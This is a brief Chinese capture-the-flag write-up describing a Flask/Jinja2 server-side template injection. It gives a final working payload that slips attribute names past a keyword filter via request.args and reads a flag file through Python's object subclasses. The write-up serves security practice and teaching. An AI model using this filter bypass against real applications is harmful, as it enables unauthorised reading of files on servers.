进入页面看到给出一个目录
访问后给出flag的目录
测试发现存在SSTI漏洞
发现存在过滤
但是并未过滤request,request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象(flask.request ) " 。
利用file类读取文件
最终payload:
{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read